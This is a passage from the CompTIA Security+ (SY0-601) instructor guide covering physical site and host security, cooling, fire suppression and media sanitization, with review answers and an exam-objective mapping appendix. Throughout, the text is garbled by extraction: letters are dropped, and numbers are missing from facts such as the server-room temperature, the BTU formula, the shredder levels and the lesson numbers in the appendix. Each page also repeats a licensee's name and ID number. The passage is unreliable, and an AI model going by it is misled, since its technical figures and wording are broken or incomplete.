of and around a location to protect it. They can monitor critical checkpoints and verify
identification, allow or disallow access, and log physical entry events. They also provide
a visual deterrent and can apply their own knowledge and intuition to potential security
breaches. The visible presence of guards is a very e ective intrusion detection and
deterrence mechanism, but is correspondingly expensive. It also may not be possible
to place security guards within certain zones because they cannot be granted an
appropriate security clearance. Training and screening of security guards is imperative.
CCTV (closed circuit television) is a cheaper means of providing surveillance than
maintaining separate guards at each gateway or zone, though still not cheap to set up
if the infrastructure is not already in place on the premises. It is also uite an e ective
deterrent. The other big advantage is that movement and access can be recorded. The
main drawback compared to the presence of security guards is that response times are
longer, and security may be compromised if not enough sta are in place to monitor
the camera feeds.

Lesson 21: Explaining Physical Security | Topic 21A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 545

CCT installed to monitor a server room. (Image by ario o Presti 1 rf.com.)

The cameras in a CCT network are typically connected to a multiple er using coa ial
cabling. The multiplexer can then display images from the cameras on one or more
screens, allow the operator to control camera functions, and record the images to tape
or hard drive. Newer camera systems may be linked in an IP network, using regular
data cabling.

If you consider control types, a security guard is a preventive control, as the guard can both
discover and act to prevent an attack. A camera is a detective control only.

Camera systems and robotics can use AI and machine learning to implement smart
physical security (theverge.com artificial intelligence surveillance
cameras-security):
• Motion recognition the camera system might be configured with gait identification
technology. This means that the system can generate an alert when anyone moves
within sight of the camera and the pattern of their movement does not match a
known and authorized individual.

• Object detection—the camera system can detect changes to the environment, such
as a missing server, or unknown device connected to a wall port.

• Robot sentries—surveillance systems (and in some cases weapon systems) can be

mounted on a wholly or partially autonomous robot (switch.com/switch-sentry).

• Drones/UAV—cameras mounted on drones can cover wider areas than ground-

based patrols (zdnet.com/article/best-security-surveillance-drones-for-business).

Lesson 21: Explaining Physical Security | Topic 21A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 546 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Reception Personnel and ID Badges

Reception Personnel
One of the most important parts of surveillance is the challenge policy. This sets out
and ID Badges what type of response is appropriate in given situations and helps to defeat social
engineering attacks. This must be communicated to and understood by the sta .
Challenges represent a whole range of di erent contact situations. or e ample
• Challenging visitors who do not have ID badges or are moving about
unaccompanied.

• Insisting that proper authentication is completed at gateways, even if this means

inconveniencing sta members no matter their seniority .

• Intruders and or security guards may be armed. The safety of sta and compliance
with local laws has to be balanced against the imperative to protect the company's
other resources.

It is much easier for employees to use secure behavior in these situations if they know
that their actions are conforming to a standard of behavior that has been agreed upon
and is expected of them.

Reception Personnel and Visitor Logs

An access list held at the reception area for each secure gateway records who is
allowed to enter. An electronic lock may be able to log access attempts or a reception
sta can manually log movement. At the lowest end, a sign in and sign out sheet can
be used to record authorized access. Visitor logging requirements will vary depending
on the organization, but should include at least the name and company being
represented, date, time of entry and departure, reason for visiting, and contact within
the organization.

Two-Person Integrity/Control
eception areas for high security ones might be sta ed by at least two people at all
times, providing integrity for entry control and reducing the risk of insider threat.

ID Badges
A photographic ID badge showing name and (perhaps) access details is one of the
cornerstones of building security. Anyone moving through secure areas of a building
should be wearing an ID badge anyone without an ID badge should be challenged.
Color coding could be used to make it obvious to which ones a badge is granted
access.

Lesson 21: Explaining Physical Security | Topic 21A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 547

Review Activity:
hysical Site Security ontrols
Answer the following questions:

1. What physical site security controls act as deterrents?

Lighting is one of the most e ective deterrents. Any highly visible security control
guards, fences, dogs, barricades, CCT , signage, and so on will act as a deterrent.

2. What use might a proximity reader be for site security?

One type of proximity reader allows a lock to be operated by a contactless smart card.
Proximity sensors can also be used to track objects via RFID tags.

3. What are the two main options for mobile camera surveillance?

Robot sentries and drone/UAV-mounted cameras.

4. What physical security system provides mitigation against juice-jacking?

A USB data blocker can be attached to the end of a cable to prevent a charging port
from trying to make a data connection.

Lesson 21: Explaining Physical Security | Topic 21A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 548 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 21B
Explain the Importance of Physical
ost Security ontrols

Teaching EXAM OBJECTIVES COVERED

Tip 2.7 Explain the importance of physical security controls
.1 Given a scenario, use the appropriate tool to assess organizational security ( ata
The final topic covers
environmental
sanitization only)
security and remnant
removal. As with data networks, perimeter defenses are not sufficient to ensure the security of
hosts within a site. As well as the risk that the perimeter could be breached, security
systems must also be resilient against insider threats. You need to deploy additional
controls to secure areas, such as computer rooms and data centers.
Environmental security ensures that risks to availability from hosts overheating are
minimi ed. All sites also need e ective procedures for the disposal of e uipment and
paper records, to ensure that confidential data remnants are not at risk of e posure.

Show Slide(s) ecure Areas

ecure Areas
A secure area is designed to store critical assets with a higher level of access protection
than general office areas. The most vulnerable point of the network infrastructure will
be the communications or server room. This should be sub ect to the most stringent
access and surveillance controls that can be a orded. imilar measures apply to
hardening access to data centers.
Installing equipment within secure cabinets/enclosures provides mitigation
against insider attack and attacks that have broken through the perimeter security
mechanisms. These can be supplied with key-operated or electronic locks.

ack cabinet with key-operated lock. (Image 1 .com.)

Lesson 21: Explaining Physical Security | Topic 21B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 549

ome data centers may contain racks with e uipment owned by di erent companies
(colocation). These racks can be installed inside cages so that technicians can only
physically access the racks housing their own company's servers and appliances.

Colocation cages. (Image Chris ag and shared with CC Y .0 ickr.com photos

chrisdag/865711871.)

Air Gap/Demilitarized Zone

An air gapped host is one that is not physically connected to any network. Such a host
would also normally have stringent physical access controls, such as housing it within a
secure enclosure, validating any media devices connected to it, and so on.
An air gap within a secure area serves the same function as a demilitarized zone. It is
an empty area surrounding a high-value asset that is closely monitored for intrusions.
As well as being disconnected from any network, the physical space around the host
makes it easier to detect unauthorized attempts to approach the asset. Security
policies should prevent any unauthorized computing hosts or storage media from
being carried into the DMZ.

Safes and Vaults

Portable devices and media (backup tapes or USB media storing encryption keys, for
instance) may be stored in a safe. Safes can feature key-operated or combination locks
but are more likely to come with electronic locking mechanisms. Safes can be rated to
a particular cash value for the contents against various international grading schemes.
There are also fire safes that give a certain level of protection against e posure to
smoke and ame and to water penetration from fire e tinguishing e orts .
A vault is a room that is hardened against unauthorized entry by physical means, such
as drilling or explosives. A vault is expensive, but may be considered necessary for
mission critical assets that need to be very securely air gapped, such as the root server
for a commercial CA.

Lesson 21: Explaining Physical Security | Topic 21B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 550 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) Protected Distribution and Faraday Cages

Protected Distribution
A physically secure cabled network is referred to as protected cable distribution or as a
and araday Cages protected distribution system (PDS). There are two principal risks:
• An intruder could attach eavesdropping equipment to the cable (a tap).

• An intruder could cut the cable (Denial of Service).

A hardened PDS is one where all cabling is routed through sealed metal conduit and
sub ect to periodic visual inspection. Lower grade options are to use di erent materials
for the conduit (plastic, for instance). Another option is to install an alarm system within
the cable conduit, so that intrusions can be detected automatically.
It is possible to install communications equipment within a shielded enclosure,
known as a Faraday Cage. The cage is a charged conductive mesh that blocks
signals from entering or leaving the area. The risk of eavesdropping from leakage
of electromagnetic signals was investigated by the DoD who defined T M T
(Transient Electromagnetic Pulse Emanation Standard) as a means of shielding the
signals.

Show Slide(s) eatin entilation Air Conditionin

eating, entilation,
Environmental controls mitigate the loss of availability through mechanical issues
Air Conditioning with equipment, such as overheating. Building control systems maintain an optimum
working environment for di erent parts of the building. The acronym HVAC (Heating,
Teaching Ventilation, Air Conditioning) is often used to describe these services. An AC uses
Tip temperature sensors and moisture detection sensors (to measure humidity).
Some students
might not consider Use a portable monitor to verify that the AC s temperature and humidity sensors are
environmental returning the correct readings.
exposures to be
information security
issues. Throughout
the topic, encourage For computer rooms and data centers, a thermostatically controlled environment is
discussion of how
various forms of
usually kept at a temperature of around C and relative humidity of
security should work 50%. The heat generated by equipment per hour is measured in British Thermal Units
together to protect T or kilowatts . is T . To calculate the cooling re uirement for an
all assets of an air conditioning system, multiply the wattage of all equipment in the room (including
organization. lighting by . to get the T hour. If the server room is occupied unlikely in most
cases , add T person. The air conditioner's T rating must e ceed this total
value.

Some data centers (notably those operated by Google) are allowing higher temperatures
(up to around 6 C 0 ). This can achieve significant energy cost savings and modern
electronics is proving reliable at this temperature.

The positive air pressure created by the AC system also forces contaminants such as
dust out of the facility. ilters on AC systems collect the dust and must be changed
regularly. When using an air conditioning system, ensure that it is inspected and
maintained periodically. ystems may be fitted with alarms to alert sta to problems.
Mission critical systems may require a backup air conditioning system.

The server room should not be used as storage space. o not leave boxes or unused
equipment in it. Also, do not install unnecessary devices that generate a lot of heat and
dust, such as printers.

Lesson 21: Explaining Physical Security | Topic 21B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 551

Hot and Cold Aisles Show Slide(s)

A data center or server room should be designed in such a way as to ma imi e air ow ot and Cold Aisles
across the server or racks. If multiple racks are used, install equipment so that servers
are placed back-to-back not front-to-back, so that the warm exhaust from one bank of
servers is not forming the air intake for another bank. This is referred to as a hot aisle/
cold aisle arrangement. In order to prevent air leaks from the hot aisle to the cold
aisle, ensure that any gaps in racks are filled by blank panels and use strip curtains or
excluders to cover any spaces above or between racks.

ot aisle containment design Cold air circulates from the air conditioner under the oor and around
the rack, while hot air is drawn from between the racks through the ceiling space (plenum) to a heat
exchanger. In this design, it is important that hot air does not leak from the ceiling or from the oor
space between the racks. (Image 1 .com.)

Make sure that cabling is secured by cable ties or ducting and does not run across
walkways. Cable is best run using a raised oor. If running cable through plenum
spaces, make sure it is fire retardant and be conscious of minimi ing pro imity to
electrical sources, such as electrical cable and uorescent light, which can corrupt data
signals (Electromagnetic Interference [EMI]). You also need to ensure that there is
sufficient space in the plenum for the air conditioning system to work properly filling
the area with cable is not the best idea.

To reduce interference, data network cabling should not be run parallel to power cabling. If
E I is a problem, shielded cabling can be installed. Alternatively, the copper cabling could
be replaced with fiber optic cabling, which is not susceptible to E I.

Fire Detection and Suppression Show Slide(s)

ealth and safety legislation dictates what mechanisms an organi ation must put in Fire Detection and
place to detect and suppress fires. ome basic elements of fire safety include uppression
• ell marked fire e its and an emergency evacuation procedure that is tested and
practiced regularly.

• uilding design that does not allow fire to spread uickly, by separating di erent
areas with fire resistant walls and doors.

Lesson 21: Explaining Physical Security | Topic 21B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 552 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

• Automatic smoke or fire detection systems, as well as alarms that can be operated
manually.

Fire suppression systems work on the basis of the fire triangle. The fire triangle
works on the principle that a fire re uires heat, o ygen, and fuel to ignite and burn.
emoving any one of those elements provides fire suppression and prevention . In
the and most other countries , fires are divided by class under the N A National
Fire Protection Association) system, according to the combustible material that fuels
the fire. ortable fire e tinguishers come in several di erent types, with each type
being designed for fighting a particular class of fire. Notably, Class C e tinguishers use
gas-based extinguishing and can be used where the risk of electric shock makes other
types unsuitable.

Under the European classification system, electrical fires are Class E.

remises may also be fitted with an overhead sprinkler system. et pipe sprinklers
work automatically, are triggered by heat, and discharge water. Wet-pipe systems
constantly hold water at high pressure, so there is some risk of burst pipes and
accidental triggering, as well as the damage that would be caused in the event of
an actual fire. There are several alternatives to wet pipe systems that can minimi e
damage that may be caused by water ooding the room.
• Dry pipe these are used in areas where free ing is possible water only enters this
part of the system if sprinklers elsewhere are triggered.
• re action a pre action system only fills with water when an alarm is triggered
it will then spray when the heat rises. This gives protection against accidental
discharges and burst pipes and gives some time to contain the fire manually before
the sprinkler operates.
• alon gas based systems have the advantage of not short circuiting electrical
systems and leaving no residue. p until a few years ago, most systems used alon
. The use of alon has been banned in most countries as it is o one depleting,
though existing installations have not been replaced in many instances and can
continue to operate legally.
• Clean agent alternatives to alon are referred to as clean agent. As well as not
being environmentally damaging, these gases are considered nontoxic to humans.
amples include IN N a mi ture of C 2, argon, and nitrogen , M C
, and . The gases both deplete the concentration of o ygen in the area
though not to levels dangerous to humans and have a cooling e ect. C 2 can be
used too, but it is not safe for use in occupied areas.

Show Slide(s) ecure ata estruction

Secure Data
Physical security controls also need to take account of the disposal phase of the data
Destruction life cycle. Media sanitization and remnant removal refer to erasing data from hard
drives, ash drives Ds, tape media, CD and D D Ms before they are disposed of
or put to a di erent use. aper documents must also be disposed of securely. Data
remnants can be dealt with either by destroying the media or by purging it (removing
the confidential information but leaving the media intact for reuse .
One approach to sanitization is to destroy the media, rendering it unusable. There are
several physical destruction options:
• urning incineration is an e ective method for all media types, so long as it is
performed in a furnace designed for media sanitization. Municipal incinerators may
leave remnants.

Lesson 21: Explaining Physical Security | Topic 21B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 553

• Shredding and pulping—most media can be shredded. For paper documents,

shredders are rated by the si e of the remnants they reduce a sheet to. Level is
mm strips, while Level is . mm particles. ulping the shredded remains with
water or incinerating them provides an e tra measure of protection. ome office
shredders can destroy optical media too. Industrial shredders can destroy hard
drives and ash drives.
• Pulverizing—hitting a hard drive with a hammer can leave a surprising amount of
recoverable data, so this type of destruction should be performed with industrial
machinery.
• Degaussing— exposing a hard disk to a powerful electromagnet disrupts the
magnetic pattern that stores the data on the disk surface. Note that Ds, ash
media, and optical media cannot be degaussed, only hard disk drives.
Due to the cost of facilities, physical destruction is likely to be contracted to a third
party. It is important to use a reputable service provider and to obtain a detailed
inventory of how each media item was saniti ed and certificates of destruction.

ata aniti ation Tools Show Slide(s)

Files deleted from a magnetic-type hard disk are not erased. Rather, the sectors are Data aniti ation Tools
marked as available for writing and the data they contain will only be removed as new
files are added. imilarly, using the standard indows format tool will only remove Teaching
references to files and mark all sectors as usable. Tip
The standard method of saniti ing an DD is called overwriting. This can be performed It seems fitting to
end the course with
using the drive's firmware tools or a utility program. The most basic type of overwriting irrevocable techniques
is called ero filling, which ust sets each bit to ero. ingle pass ero filling can leave to utterly destroy
patterns that can be read with specialist tools. A more secure method is to overwrite information!
the content with one pass of all zeros, then a pass of all ones, and then a third pass in a
pseudorandom pattern. Some secret service agencies require more than three passes.
Overwriting can take a considerable amount of time to complete, depending on the
number of passes.

Active ill isk data wiping software. (Screenshot used with permission from Soft Technologies, Inc.)

Lesson 21: Explaining Physical Security | Topic 21B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 554 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Examples of tools supporting secure file or disk erasing include Sdelete (part of Sysinternals
docs.microsoft.com/sysinternals) and arik s oot and uke (dban.org), plus the Active
ill isk suite shown here.

Secure Erase (SE)

ince , the ATA and erial Attached C I A specifications have included a
Secure Erase (SE) command. This command can be invoked using a drive/array utility
or the hdparm Linu utility. n DDs, this performs a single pass of ero fillin .
or Ds and hybrid drives and some thumb drives and ash memory cards,
overwriting methods are not reliable, because the device uses wear-leveling routines
in the drive controller to communicate which locations are available for use to any
software process accessing the device.
On SSDs, the SE command marks all blocks as empty. A block is the smallest unit on
ash media that can be given an erase command. The drive firmware's automatic
garbage collectors then perform the actual erase of each block over time. If this
process is not completed (and there is no progress indicator), there is a risk of remnant
recovery, though this requires removing the chips from the device to analyze them in
specialist hardware.

Instant Secure Erase (ISE)

DDs and Ds that are self encrypting drives Ds support another option, invoking
a ANITI command set in ATA and A standards from to perform a crypto
erase. Drive vendors implement this as Instant Secure Erase (ISE). With an SED, all data
on the drive is encrypted using a media encryption key. When the erase command is
issued, the M is erased, rendering the data unrecoverable. I or I
validation provides assurance that the cryptographic implementation is strong.

If the device firmware does not support encryption, using a software disk encryption
product and then destroying the key and using SE should be sufficient for most
confidentiality re uirements.

Lesson 21: Explaining Physical Security | Topic 21B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 555

Review Activity:
hysical ost Security ontrols
Answer the following questions:

1. What policy describes preventing any type of unauthorized computing,

network, or storage connection to a protected host?

This can be described as an air gap or secure area demilitarized zone (DMZ).

2. here ould ou e pect to find hot and cold aisles and hat is their
purpose?

This layout is used in a data center or large server room. The layout is the best way to
maintain a stable temperature and reduce loss of availability due to thermal problems.

3. What security controls might be used to implement protected distribution

of cabling?

Make conduit physically difficult to access, use alarms to detect attempts to interfere
with conduit, and use shielded cabling.

4. What physical security device could you use to ensure the safety of onsite
backup tapes?

A fireproof safe or vault.

5. Which sanitization solution meets all the following requirements:

compatible with both HDD and SSD media, fast operation, and leaves the
media in a reusable state?

A crypto erase or Instant Secure Erase (ISE) sanitizes media by encrypting the data and
then erasing the crytpographic key.

6. What type of physical destruction media sanitization method is not suitable

for USB thumb drives?

Degaussing is ine ective against all types of ash media, including thumb drives, Ds,
hybrid drives, and memory cards.

Lesson 21: Explaining Physical Security | Topic 21B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 556 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Lesson 21
Summary
Teaching You should be able to explain the importance of physical security controls for access,
Tip surveillance, environmental protection, and secure data destruction.
Check that students
are confident about
the content that has
Guidelines for Physical Security Controls
been covered. If there
Follow these guidelines for deploying or upgrading physical security controls:
is time, revisit any
content examples that • If possible, design sites as zones to maximize access controls and surveillance for
they have questions the most secure areas, using industrial camou age, DM s, air gaps, vaults, and safes
about. If you have
used all the available
where applicable.
time for this lesson
block, note the issues,
• Secure the site perimeter and access points using fencing, barricades/bollards, and
and schedule time for locks (physical, electronic, and biometric). If using smart cards, use a type that is
a review later in the resistant to cloning/skimming.
course.
• Monitor the site using security guards, CCT , robot sentries, and drones A , and
use e ective lighting to ma imi e surveillance.

• Deploy an alarm system (circuit, motion-based, proximity, and/or duress) to detect

intrusion.

• Use security guards, reception personnel, and ID badges to authorize access,

considering the importance of two-person control for integrity.

• Ensure environmental security of compute resources using temperature and

humidity controls and sensors, hot cold aisle facilities design, and fire detection and
suppression systems.

• Use either physical destruction or data sanitization methods to ensure remnant

removal when disposing of media and devices.

Lesson 21: Explaining Physical Security

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Appendix A
Mapping Course Content to CompTIA
Security+ (Exam SY0-601)
Achieving CompTIA ecurity certification re uires candidates to pass am .
This table describes where the e am ob ectives for am are covered in this
course.

Domain and Objective Covered in

1.0 Attacks, Threats, and Vulnerabilities Lesson , Topic A

Compare and contrast di erent t pes o social Lesson , Topic A

engineering techniques
hishing Lesson , Topic A
mishing Lesson , Topic A
ishing Lesson , Topic A
pam Lesson , Topic A
pam over Internet messaging IM Lesson , Topic A
pear phishing Lesson , Topic A
Dumpster diving Lesson , Topic A
houlder surfing Lesson , Topic A
harming Lesson , Topic A
Tailgating Lesson , Topic A
liciting information Lesson , Topic A
haling Lesson , Topic A
repending Lesson , Topic A
Identity fraud Lesson , Topic A
Invoice scams Lesson , Topic A
Credential harvesting Lesson , Topic A
econnaissance Lesson , Topic A
oa Lesson , Topic A
Impersonation Lesson , Topic A
atering hole attack Lesson , Topic A
Typo s uatting Lesson , Topic A
rete ting Lesson , Topic A
In uence campaigns Lesson , Topic A
ybrid warfare Lesson , Topic A
ocial media Lesson , Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 A-2 | Appendix A

Domain and Objective Covered in

rinciples reasons for e ectiveness Lesson , Topic A
Authority Lesson , Topic A
Intimidation Lesson , Topic A
Consensus Lesson , Topic A
carcity Lesson , Topic A
amiliarity Lesson , Topic A
Trust Lesson , Topic A
rgency Lesson , Topic A
i en a scenario anal e potential indicators to Lesson , Topic
determine the t pe o attac Lesson , Topic C
Lesson , Topic
Lesson , Topic A
Lesson , Topic
Lesson , Topic C
Lesson , Topic A
Malware Lesson , Topic
ansomware Lesson , Topic
Tro ans Lesson , Topic
orms Lesson , Topic
otentially unwanted programs s Lesson , Topic
ileless virus Lesson , Topic
Command and control Lesson , Topic
ots Lesson , Topic
Cryptomalware Lesson , Topic
Logic bombs Lesson , Topic
pyware Lesson , Topic
eyloggers Lesson , Topic
emote access Tro an AT Lesson , Topic
ootkit Lesson , Topic
ackdoor Lesson , Topic
assword attacks Lesson , Topic
praying Lesson , Topic
Dictionary Lesson , Topic
rute force Lesson , Topic
ine Lesson , Topic
nline Lesson , Topic
ainbow tables Lesson , Topic
lainte t unencrypted Lesson , Topic
hysical attacks Lesson , Topic A
Lesson , Topic A
Malicious universal serial bus cable Lesson , Topic A
Malicious ash drive Lesson , Topic A

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Appendix A | A-3

Domain and Objective Covered in

Card cloning Lesson , Topic A
kimming Lesson , Topic A
Adversarial artificial intelligence AI Lesson , Topic C
Tainted training data for machine learning ML Lesson , Topic C
ecurity of machine learning algorithms Lesson , Topic C
upply chain attacks Lesson , Topic A
Cloud based vs. on premises attacks Lesson , Topic
Cryptographic attacks Lesson , Topic C
irthday Lesson , Topic C
Collision Lesson , Topic C
Downgrade Lesson , Topic C
i en a scenario anal e potential indicators Lesson , Topic A
associated with application attacks Lesson , Topic
rivilege escalation Lesson , Topic A
Cross site scripting Lesson , Topic
In ections Lesson , Topic
Lesson , Topic A
tructured uery language L Lesson , Topic
Dynamic link library DLL Lesson , Topic A
Lightweight directory access protocol LDA Lesson , Topic
tensible markup language ML Lesson , Topic
ointer ob ect dereference Lesson , Topic A
Directory traversal Lesson , Topic
u er over ows Lesson , Topic A
ace conditions Lesson , Topic A
Time of check time of use Lesson , Topic A
rror handling Lesson , Topic A
Improper input handling Lesson , Topic A
eplay attack Lesson , Topic
ession replays Lesson , Topic
Integer over ow Lesson , Topic A
e uest forgeries Lesson , Topic
erver side Lesson , Topic
Cross site Lesson , Topic
Application programming interface A I attacks Lesson , Topic
esource e haustion Lesson , Topic A
Memory leak Lesson , Topic A
ecure sockets layer L stripping Lesson , Topic
Driver manipulation Lesson , Topic A
himming Lesson , Topic A
efactoring Lesson , Topic A
ass the hash Lesson , Topic A

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 A-4 | Appendix A

Domain and Objective Covered in

i en a scenario anal e potential indicators Lesson , Topic
associated with network attacks Lesson , Topic C
Lesson , Topic D
Lesson , Topic A
Lesson , Topic
Lesson , Topic D
ireless Lesson , Topic C
Lesson , Topic
vil twin Lesson , Topic C
ogue access point Lesson , Topic C
luesnarfing Lesson , Topic
lue acking Lesson , Topic
Disassociation Lesson , Topic C
Jamming Lesson , Topic C
adio fre uency identifier ID Lesson , Topic
Near field communication N C Lesson , Topic
Initiali ation vector I Lesson , Topic C
n path attack previously known as man in the middle Lesson , Topic
attack man in the browser attack Lesson , Topic D
Layer attacks Lesson , Topic
Address resolution protocol A poisoning Lesson , Topic
Media access control MAC ooding Lesson , Topic
MAC cloning Lesson , Topic
Domain name system DN Lesson , Topic A
Domain hi acking Lesson , Topic A
DN poisoning Lesson , Topic A
niversal resource locator L redirection Lesson , Topic A
Domain reputation Lesson , Topic A
Distributed denial of service DDo Lesson , Topic D
Network Lesson , Topic D
Application Lesson , Topic D
perational technology T Lesson , Topic D
Malicious code or script e ecution Lesson , Topic D
ower hell Lesson , Topic D
ython Lesson , Topic D
ash Lesson , Topic D
Macros Lesson , Topic D
isual asic for Applications A Lesson , Topic D
plain di erent threat actors ectors and Lesson , Topic A
intelligence sources Lesson , Topic
Actors and threats Lesson , Topic A
Advanced persistent threat A T Lesson , Topic A
Insider threats Lesson , Topic A

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Appendix A | A-5

Domain and Objective Covered in

tate actors Lesson , Topic A
acktivists Lesson , Topic A
cript kiddies Lesson , Topic A
Criminal syndicates Lesson , Topic A
ackers Lesson , Topic A
Authori ed Lesson , Topic A
nauthori ed Lesson , Topic A
emi authori ed Lesson , Topic A
hadow IT Lesson , Topic A
Competitors Lesson , Topic A
Attributes of actors Lesson , Topic A
Internal e ternal Lesson , Topic A
Level of sophistication capability Lesson , Topic A
esources funding Lesson , Topic A
Intent motivation Lesson , Topic A
ectors Lesson , Topic A
Direct access Lesson , Topic A
ireless Lesson , Topic A
mail Lesson , Topic A
upply chain Lesson , Topic A
ocial media Lesson , Topic A
emovable media Lesson , Topic A
Cloud Lesson , Topic A
Threat intelligence sources Lesson , Topic
pen source intelligence INT Lesson , Topic
Closed proprietary Lesson , Topic
ulnerability databases Lesson , Topic
ublic private information sharing centers Lesson , Topic
Dark web Lesson , Topic
Indicators of compromise Lesson , Topic
Automated indicator sharing AI Lesson , Topic
tructured Threat Information e pression TI Lesson , Topic
Trusted Automated e change of Indicator Information
TA II
redictive analysis Lesson , Topic
Threat maps Lesson , Topic
ile code repositories Lesson , Topic
esearch sources Lesson , Topic
endor websites Lesson , Topic
ulnerability feeds Lesson , Topic
Conferences Lesson , Topic

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 A-6 | Appendix A

Domain and Objective Covered in

Academic ournals Lesson , Topic
e uest for comments C Lesson , Topic
Local industry groups Lesson , Topic
ocial media Lesson , Topic
Threat feeds Lesson , Topic
Adversary tactics, techni ues, and procedures TT Lesson , Topic
6 plain the securit concerns associated ith arious Lesson , Topic
t pes o ulnera ilities
Cloud based vs. on premises vulnerabilities Lesson , Topic
ero day Lesson , Topic
eak configurations Lesson , Topic
pen permissions Lesson , Topic
nsecure root accounts Lesson , Topic
rrors Lesson , Topic
eak encryption Lesson , Topic
nsecure protocols Lesson , Topic
Default settings Lesson , Topic
pen ports and services Lesson , Topic
Third party risks Lesson , Topic
endor management Lesson , Topic
ystem integration Lesson , Topic
Lack of vendor support Lesson , Topic
upply chain Lesson , Topic
utsourced code development Lesson , Topic
Data storage Lesson , Topic
Improper or weak patch management Lesson , Topic
irmware Lesson , Topic
perating system Lesson , Topic
Applications Lesson , Topic
Legacy platforms Lesson , Topic
Impacts Lesson , Topic
Data loss Lesson , Topic
Data breaches Lesson , Topic
Data e filtration Lesson , Topic
Identity theft Lesson , Topic
inancial Lesson , Topic
eputation Lesson , Topic
Availability loss Lesson , Topic
ummari e the techni ues used in securit assessments Lesson , Topic C
Lesson , Topic C
Threat hunting Lesson , Topic C
Intelligence fusion Lesson , Topic C

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Appendix A | A-7

Domain and Objective Covered in

Threat feeds Lesson , Topic C
Advisories and bulletins Lesson , Topic C
Maneuver Lesson , Topic C
ulnerability scans Lesson , Topic C
alse positives Lesson , Topic C
alse negatives Lesson , Topic C
Log reviews Lesson , Topic C
Credentialed vs. non credentialed Lesson , Topic C
Intrusive vs. non intrusive Lesson , Topic C
Application Lesson , Topic C
eb application Lesson , Topic C
Network Lesson , Topic C
Common ulnerabilities and posures C Common Lesson , Topic C
ulnerability coring ystem C
Configuration review Lesson , Topic C
yslog ecurity information and event management I M Lesson , Topic C
eview reports Lesson , Topic C
acket capture Lesson , Topic C
Data inputs Lesson , Topic C
ser behavior analysis Lesson , Topic C
entiment analysis Lesson , Topic C
ecurity monitoring Lesson , Topic C
Log aggregation Lesson , Topic C
Log collectors Lesson , Topic C
ecurity orchestration, automation, and response A Lesson , Topic C
1.8 Explain the techniques used in penetration testing Lesson , Topic D
enetration testing Lesson , Topic D
nown environment Lesson , Topic D
nknown environment Lesson , Topic D
artially known environment Lesson , Topic D
ules of engagement Lesson , Topic D
Lateral movement Lesson , Topic D
rivilege escalation Lesson , Topic D
ersistence Lesson , Topic D
Cleanup Lesson , Topic D
ug bounty Lesson , Topic D
ivoting Lesson , Topic D
assive and active reconnaissance Lesson , Topic D
Drones Lesson , Topic D
ar ying Lesson , Topic D
ar driving Lesson , Topic D

Appendix A apping Course Content to CompTIA Certification

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 A-8 | Appendix A

Domain and Objective Covered in

ootprinting Lesson , Topic D
INT Lesson , Topic D
ercise types Lesson , Topic D
ed team Lesson , Topic D
lue team Lesson , Topic D
hite team Lesson , Topic D
urple team Lesson , Topic D
2.0 Architecture and Design
plain the importance o securit concepts in an Lesson , Topic A
enterprise environment Lesson , Topic
Lesson , Topic A
Lesson , Topic
Lesson , Topic C
Configuration management Lesson , Topic C
Diagrams Lesson , Topic C
aseline configuration Lesson , Topic C
tandard naming conventions Lesson , Topic C
Internet protocol I schema Lesson , Topic C
Data sovereignty Lesson , Topic A
Data protection Lesson , Topic
Data loss prevention DL Lesson , Topic
Masking Lesson , Topic
ncryption Lesson , Topic
At rest Lesson , Topic
In transit motion Lesson , Topic
In processing Lesson , Topic
Tokeni ation Lesson , Topic
ights management Lesson , Topic
eographical considerations Lesson , Topic A
esponse and recovery controls Lesson , Topic C
ecure ockets Layer L Transport Layer ecurity TL Lesson , Topic
inspection
ashing Lesson , Topic A
A I considerations Lesson , Topic
ite resiliency Lesson , Topic C
ot site Lesson , Topic C
Cold site Lesson , Topic C
arm site Lesson , Topic C
